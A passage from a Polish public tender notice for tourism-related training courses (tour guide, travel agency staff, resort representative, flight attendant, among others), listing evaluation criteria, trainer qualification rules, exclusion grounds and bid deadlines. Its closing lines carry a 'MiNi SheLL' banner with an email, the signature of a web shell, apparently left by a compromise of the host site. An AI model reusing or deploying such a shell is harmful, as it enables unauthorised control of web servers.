szkoleniowych takich jak: podręczniki, skrypty i inne materiały potrzebne do przeprowadzenia szkolenia.<br/>6.	Wykonawca zobowiązany będzie po zakończeniu realizacji usługi do dostarczenia dokumentacji przebiegu szkolenia obejmującej: <br/>ee) Program i harmonogram zajęć<br/>ff)	Dziennik zajęć edukacyjnych obejmujących listę obecności, wymiar godzin i tematy zajęć edukacyjnych, <br/>gg)	protokół z przeprowadzonego testu. <br/>hh)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia.<br/>ii)	Kopie zaświadczeń dla uczestników<br/>jj)	Innych dokumentów w związanych z realizacja kursu<br/>Ponadto:<br/>1.	Wszelka dokumentacja dotycząca kursu powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo projektu.<br/>2.	Zajęcia będą odbywać się w siedzibie Zamawiającego .<br/>3.	Zamawiający zapewni niezbędny sprzęt i narzędzia dydaktyczne ( laptopy, tablice interaktywne, rzutniki itp..) konieczne do realizacji szkolenia. Zapewni ponadto odpowiednie zaplecze dydaktyczne do realizacji zajęć praktycznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty (w każdej części odrębnie) zamawiający będzie się kierował następującymi kryteriami:<br/><br/>1)	C - cena	-	60%<br/><br/>Przy dokonywaniu oceny (w każdej części odrębnie) ofert Zamawiający będzie stosował następujące zasady: <br/>w kryterium cena zastosowany zostanie następujący wzór arytmetyczny:<br/>C = (X min ÷ X obliczana) x W max <br/>•	C – liczba punktów otrzymanych w danym kryterium<br/>•	W max – waga kryterium – maksymalna liczba punktów, która może być przyznana w danym kryterium<br/>•	X min – najniższa wartość w danym kryterium spośród złożonych ofert w danej części<br/>•	X obliczana – wartość obliczanej oferty w danym kryterium.<br/><br/><br/>2)	D – doświadczenie wykładowcy - 40% (odrębnie dla każdej części)<br/><br/>W kryterium doświadczenie wykładowcy, który będzie prowadził szkolenie Zamawiający przyzna punkty za doświadczenie zawodowe wykładowcy w następujący sposób (odrębnie dla każdej części):<br/><br/><br/><br/>Wykonawca może otrzymać punkty wg niniejszego wzoru:<br/>D = (Do / Dmax) x 40<br/>gdzie:<br/>Dmax – największa ilość szkoleń z ww. tematu przeprowadzonych przez trenera spośród ofert złożonych w niniejszym postępowaniu<br/>Do – ilość szkoleń z zakresu ww. tematu wskazana w ofercie badanej.<br/>Maksymalnie można uzyskać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.4.	zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia warunku w zakresie zdolności technicznej.<br/>Warunek zdolności zawodowej zostanie spełniony jeśli Wykonawca wykaże się dysponowaniem:<br/>•	w zakresie części 1 – Pilot wycieczek - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej dwoma osobami, z których każda posiada wykształcenie wyższe i co najmniej 5 letnie doświadczenie w zawodzie pilota wycieczek i każda z tych osób przeprowadziła co najmniej 5 szkoleń o tematyce „Pilot wycieczek” dla zorganizowanych grup młodzieży szkół ponadpodstawowych lub studentów;<br/><br/>•	w zakresie Części 2 - Pracownik biura podróży - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą wykształcenie wyższe i co najmniej 5 letnie doświadczenie w zawodzie pracownika biura podróży i że osoba ta przeprowadziła co najmniej 5 szkoleń o tematyce „Pracownik biura podróży” z dla zorganizowanych grup młodzieży szkół ponadpodstawowych lub studentów<br/><br/>•	w zakresie Części 3 - Rezydent Turystyczny dla nauczycieli - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej co najmniej jedną osobą posiadającą wykształcenie wyższe i co najmniej 5 letnie doświadczenie w zawodzie rezydenta turystycznego i że osoba ta przeprowadziła co najmniej 5 szkoleń o tematyce „Rezydent biura turystycznego” dla zorganizowanych grup młodzieży szkół ponadpodstawowych lub studentów<br/><br/>•	w zakresie Części 4 – Rezydent Turystyczny - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej co najmniej jedną osobą posiadającą wykształcenie wyższe i co najmniej 5 letnie doświadczenie w zawodzie rezydenta turystycznego i że osoba ta przeprowadziła co najmniej 5 szkoleń o tematyce „Rezydent turystyczny”.<br/><br/>•	w zakresie części 5 - Animator czasu wolnego - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą wykształcenie wyższe i co najmniej 5 letnie doświadczenie w zawodzie animatora czasu wolnego i że osoba ta przeprowadziła co najmniej 5 szkoleń o tematyce „Animator czasu wolnego” dla zorganizowanych grup młodzieży szkół ponadpodstawowych lub studentów.<br/><br/>•	w zakresie części 6- Jak zostać stewardessa/ stewardem- Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą wykształcenie wyższe, co najmniej roczny staż pracy w zawodzie stewardessy/stewarda i że osoba ta przeprowadziła co najmniej 5 szkoleń o tematyce „Jak zostać stewardessą/stewardem” dla zorganizowanych grup młodzieży szkół ponadpodstawowych lub studentów<br/><br/>•	w zakresie części 7 - Prowadzenie biura podroży - Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą wykształcenie wyższe i co najmniej 2 letnie doświadczenie w prowadzeniu lub zarządzaniu biurem podróży.<br/><br/><br/>UWAGA:<br/>a)	Przez „wykształcenie wyższe rozumie się” wykształcenie wyższe magisterskie. <br/>b)	Przy liczeniu doświadczenia zawodowego, w przypadku gdy wykładowca był zatrudniony/świadczył usługi u kilku różnych pracodawców/zleceniodawców w tym samym czasie, okresy te nie będą sumowane jeśli pokrywają się w czasie. <br/>c)	Wykazując doświadczenie zawodowe należy wskazać dokładnie datę wykonywania pracy/świadczenia usługi w formacie OD „dzień-miesiąc-rok” DO „dzień-miesiąc-rok”. Jeśli wykonawca wskaże np. lipiec 2024 – grudzień 2024 – to Zmawiający przyjmie, że praca była wykonywana od 01 07 2024 do 31 12 2024. Jeśli wykonawca wskaże np. 2023 – 2024 to Zamawiający przyjmie że praca była wykonywana od 01 01 2023 do 31 12 2024 r. <br/>d)	W przypadku zaistnienia okoliczności uniemożliwiających lub utrudniających realizację usług szkoleniowych przez osobę/y wskazaną/e przez Wykonawcę w wykazie osób, Zamawiający wyraża zgodę na zmianę tej osoby, z zastrzeżeniem, iż Wykonawca obowiązany będzie przedstawić do zatwierdzenia Zamawiającemu osobę, która będzie posiadała co najmniej takie samo doświadczenie jak osoba wskazana w wykazie osób oraz w ramach kryterium pozcenowym. <br/>e)	Wykazując doświadczenie w zakresie przeprowadzonych szkoleń wykonawca zobowiązany jest wskazać dane podmiotów (zewnętrznych) tj klientów na rzecz, których dany trener/wykładowca przeprowadził szkolenie (Nie jest dopuszczalne wskazanie danych zleceniodawcy/pracodawcy danego trenera/wykładowcy).<br/>f)	W tabeli, w kolumnie dotyczącej przeprowadzonych szkoleń należy tak zidentyfikować tematykę szkoleń, aby Zamawiający nie miał wątpliwości, że tematyka ta dotyczyła szkoleń jakich wymaga. Np. jeśli szkolenie miało inny tytuł ale obejmowało zagadnienia dotyczące tematyki wskazanej przez Zamawiającego należy to dokładnie opisać. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1 W związku z wejściem w życie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r., poz. 835):<br/>2.1.1. Z postępowania o udzielenie zamówienia wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz.Urz. UE L 134 z 20.05.2006r. z późn. zm.), zwanego dalej „rozporządzeniem 765/2006”, i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających ( Dz.Urz. UE L 78 z 17.03.2014r. z późn. zm.), zwanego dalej „rozporządzeniem 269/2014”, albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Oświadczenie o aktualności (....) <br/>Oświadczenie o niepodleganiu wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie – nie krótszym niż 5 dni od dnia wezwania - aktualnych na dzień złożenia podmiotowych środków dowodowych wymienionych poniżej:<br/><br/>a)	Oświadczenie o aktualności informacji zawartych w oświadczeniu <br/>o niepodleganiu wykluczeniu (wzór) – wg zał. nr 5 do SWZ,<br/>b)	Wykaz osób (wzór) – wg zał. nr 7 do SWZ skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykaz oświadczeń i dokumentów jakie Wykonawca musi dołączyć do oferty:<br/>a)	wypełniony formularz oferty – wg zał. nr 1 do SWZ (wzór),<br/>b)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu – wg zał. nr 4 do SWZ<br/>(wzór),<br/>c)	oświadczenie Wykonawcy o spełnianiu warunków udziału – wg. zał nr 6 do SWZ<br/>d)	zobowiązanie podmiotu trzeciego do oddania swoich zasobów – wg. zał. nr 8 do SWZ – jeśli dotyczy<br/>e)	oświadczenie podmiotu trzeciego o niepodleganiu wykluczeniu – wg zał. 9 do SWZ – jeśli dotyczy <br/>f)	pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej – jeśli dotyczy,<br/>g)	pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się <br/>o zamówienie tzw. „konsorcja” oraz spółek cywilnych) – jeśli dotyczy, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W toku prowadzonego postępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika) o którym mowa w pkt. 1 w rozdziale V SWZ.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, każdy z wykonawców wraz z ofertą składa oświadczenie o niepodleganiu wykluczeniu wg zał. nr 5 do SWZ (wzór).<br/>4.	Spółka cywilna, jest kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie zamówienia dlatego jej wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest do złożenia wraz z ofertą oświadczenia o niepodleganiu wykluczeniu wg zał. nr 5 do SWZ (wzór).<br/>5.	Wszyscy wykonawcy składający wspólną ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany treści niniejszej umowy, jak też oświadczenia woli stron w związku z jej wykonywaniem, wymagają formy pisemnej pod rygorem nieważności.<br/><br/>2.	Zamawiający zastrzega sobie prawo zmiany lub uzupełnienia Umowy w przypadku zmiany przepisów prawa, wytycznych lub innych regulacji w zakresie mającym wpływ na realizację Umowy.<br/><br/>3.	Zmiany postanowień zawartej umowy mogą być dokonywane: <br/>a)	w zakresie aktualizacji danych Wykonawcy; <br/>a)	w przypadku wystąpienia wszelkich obiektywnych zmian, niezbędnych do prawidłowego wykonania przedmiotu umowy, jeżeli taka zmiana leży w interesie publicznym, lub w interesie Zamawiającego, w tym np. w przypadku braku uznania danego szkolenia za niekwalifikowane; <br/>b)	w przypadku wystąpienia siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, <br/>c)	zmiany ilości osób, które mają być przeszkolone.<br/>d)	Zmiany terminu, w przypadku gdy z uwagi na rok szkolny niemożliwe byłoby przeprowadzenie szkoleń w pierwotnie ustalonym terminie.<br/>4.	Zgodnie z art. 439 ustawy Pzp, w przypadku zmiany kosztów usług związanych <br/>UWAGA z powodu ograniczonej ilości znaków pełen katalog zmian znajduje się w umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-09-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-09-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-10-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com